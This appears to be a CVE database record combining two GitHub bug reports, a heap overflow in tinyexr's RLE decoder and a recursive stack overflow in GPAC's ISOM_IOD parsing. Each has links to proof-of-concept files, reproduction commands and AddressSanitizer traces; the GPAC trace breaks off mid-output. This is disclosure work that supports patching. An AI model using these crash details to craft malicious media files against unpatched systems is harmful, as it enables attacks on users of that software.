[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/169" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:2022-06-28:*:*:*:*:*:*:*", "matchCriteriaId": "DB72586A-37D9-4C6D-8CED-D429A2BD5C1C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/syoyo/tinyexr/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
# Describe the issue Heap-buffer-overflow still exists in the `rleUncompress`. ***This is similar to issue https://github.com/syoyo/tinyexr/issues/112, but it seems that the patch https://github.com/syoyo/tinyexr/commit/58a625894cfbb76da1d599e4f9768f099058e0e4 has not fully fixed them.*** # To Reproduce *Environment* - OS: Ubuntu 16.04.7 LTS - Compiler: gcc version 5.4.0 *version:* latest commit https://github.com/syoyo/tinyexr/commit/0647fb3e0e65d21af354b43bdd9a0acf2913a996 *poc:* [poc](https://github.com/0xdd96/PoC/raw/main/tinyexr/tinyexr-rleUncompress-heap-buffer-overflow) Steps to reproduce the behavior: 1. Compile TinyEXR with Address Sanitizer ``` CFLAGS="-g -O0 -fsanitize=address" CXXFLAGS="-g -O0 -fsanitize=address" cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release .. ``` 2. run `./test_tinyexr ./poc` Here is the trace reported by ASAN: ``` root@d8a714203f6e:# ./test_tinyexr poc ================================================================= ==14886==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006337 at pc 0x00000040c22d bp 0x7fffffffcb50 sp 0x7fffffffcb40 READ of size 1 at 0x619000006337 thread T0 #0 0x40c22c in rleUncompress tinyexr/tinyexr.h:1522 #1 0x40c22c in DecompressRle tinyexr/tinyexr.h:1625 #2 0x40c22c in DecodePixelData tinyexr/tinyexr.h:3786 #3 0x411318 in DecodeChunk tinyexr/tinyexr.h:5176 #4 0x41a3e9 in DecodeEXRImage tinyexr/tinyexr.h:5776 #5 0x41dcc7 in LoadEXRImageFromMemory tinyexr/tinyexr.h:6465 #6 0x41dcc7 in LoadEXRImageFromFile tinyexr/tinyexr.h:6442 #7 0x4288ae in LoadEXRWithLayer tinyexr/tinyexr.h:5954 #8 0x40502f in LoadEXR tinyexr/tinyexr.h:5902 #9 0x40502f in test_main tinyexr/test_tinyexr.cc:223 #10 0x40502f in main tinyexr/test_tinyexr.cc:194 #11 0x7ffff652883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #12 0x4053b8 in _start (tinyexr/build-gcc/test_tinyexr+0x4053b8) 0x619000006337 is located 0 bytes to the right of 951-byte region [0x619000005f80,0x619000006337) allocated by thread T0 here: #0 0x7ffff6f03532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532) #1 0x41dc55 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104 #2 0x41dc55 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491 #3 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170 #4 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/5/bits/stl_vector.h:185 #5 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:136 #6 0x41dc55 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:278 #7 0x41dc55 in LoadEXRImageFromFile tinyexr/tinyexr.h:6432 SUMMARY: AddressSanitizer: heap-buffer-overflow tinyexr/tinyexr.h:1522 rleUncompress Shadow bytes around the buggy address: 0x0c327fff8c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8c60: 00 00 00 00 00 00[07]fa fa fa fa fa fa fa fa fa 0x0c327fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==14886==ABORTING ```
Heap-buffer-overflow still exists in the rleUncompress
https://api.github.com/repos/syoyo/tinyexr/issues/169/comments
3
2022-07-06T03:10:33Z
2022-07-14T07:32:10Z
https://github.com/syoyo/tinyexr/issues/169
1,295,059,789
169
4,105
CVE-2022-38530
2022-09-06T23:15:09.010
GPAC v2.1-DEV-rev232-gfcaa01ebb-master was discovered to contain a stack overflow when processing ISOM_IOD.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2216" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2216
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info:** ``` root:# MP4Box -version MP4Box - GPAC version 2.1-DEV-rev232-gfcaa01ebb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc:**[poc](https://github.com/0xdd96/PoC/raw/main/gpac/gpac-isom_iod-stack-overflow) **command:** MP4Box -hint -out /dev/null $poc$ Here is the trace reported by ASAN: ``` root:# ./MP4Box -hint -out /dev/null poc [ODF] Error reading descriptor (tag 4 size 14): Invalid MPEG-4 Descriptor [iso file] Unknown box type tra7F in parent moov [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Read Box "esds" (start 5507) failed (Invalid MPEG-4 Descriptor) - skipping [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Unknown box type drB3f in parent dinf [iso file] Missing dref box in dinf [iso file] extra box maxr found in hinf, deleting Hinting track ID 1 - Type "mp4v:mp4v" (mpeg4-generic) - BW 1393 kbps Cannot create hinter (Invalid IsoMedia File) Track ID 6 disabled - skipping hint ASAN:DEADLYSIGNAL ================================================================= ==15396==ERROR: AddressSanitizer: stack-overflow on address 0x7fffff7feff8 (pc 0x7ffff6f1b64d bp 0x7ffff75d2320 sp 0x7fffff7ff000 T0) #0 0x7ffff6f1b64c (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) #1 0x7ffff6f1b0e7 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x1030e7) #2 0x7ffff6e40271 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x28271) #3 0x7ffff6ef6b0a in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb0a) #4 0x7ffff1cba647 in gf_malloc utils/alloc.c:150 #5 0x7ffff269f8e6 in gf_odf_new_isom_iod odf/odf_code.c:739 #6 0x7ffff268357e in gf_odf_create_descriptor odf/desc_private.c:77 #7 0x7ffff2684794 in gf_odf_parse_descriptor odf/descriptors.c:88 #8 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #9 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #10 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #11 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #12 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #13 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #14 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #15 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #16 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #17 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #18 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #19 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #20 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #21 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #22 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #23 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #24 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #25 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #26 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #27 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #28 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #29 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #30 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #31 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #32 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #33 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #34 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #35 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #36 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #37 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #38 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #39 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #40 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #41 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #42 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #43 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #44 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #45 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #46 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #47 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #48 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #49 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #50 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #51 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #52 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #53 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #54 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #55 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #56 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #57 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #58 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #59 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #60 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #61 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #62 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #63 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #64 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #65 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #66 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #67 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #68 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #69 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #70 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #71 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #72 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #73 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #74 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #75 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #76 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #77 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #78 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #79 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #80 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #81 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #82 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #83 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #84 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #85 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #86 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #87 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #88 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #89 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #90 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #91 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #92 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #93 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #94 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #95 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #96 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #97 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #98 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #99 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #100 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #101 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #102 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #103 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #104 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #105 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #106 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #107 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #108 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #109 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #110 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #111 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #112 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #113 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #114 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #115 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #116 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #117 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #118 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #119 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #120 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #121 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #122 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #123 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #124 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #125 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #126 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #127 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #128 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #129 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #130 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #131 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #132 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #133 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #134 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #135 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #136 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #137 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #138 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #139 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #140 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #141 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #142 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #143 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #144 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #145 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #146 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #147 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #148 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #149 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #150 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #151 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #152 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #153 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #154 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #155 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #156 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #157 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #158 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #159 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #160 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #161 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #162 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #163 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #164 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #165 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #166 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #167 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #168 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #169 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #170 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #171 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #172 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #173 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #174 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #175 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #176 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #177 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #178 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #179 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #180 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #181 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #182 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #183 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #184 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #185 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #186 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #187 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #188 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #189 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #190 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #191 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #192 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #193 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #194 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #195 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #196 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #197 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #198 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #199 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #200 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #201 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #202 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #203 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #204 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #205 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #206 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #207 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #208 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #209 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #210 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #211 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #212 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #213 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #214 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #215 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #216 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #217 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #218 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #219 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #220 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #221 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #222 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #223 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #224 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #225 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #226 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #227 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #228 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #229 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #230 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #231 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #232 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #233 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #234 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #235 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #236 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #237 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #238 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #239 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #240 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #241 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #242 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #243 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #244 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #245 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #246 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #247 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #248 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #249 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #250 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 SUMMARY: 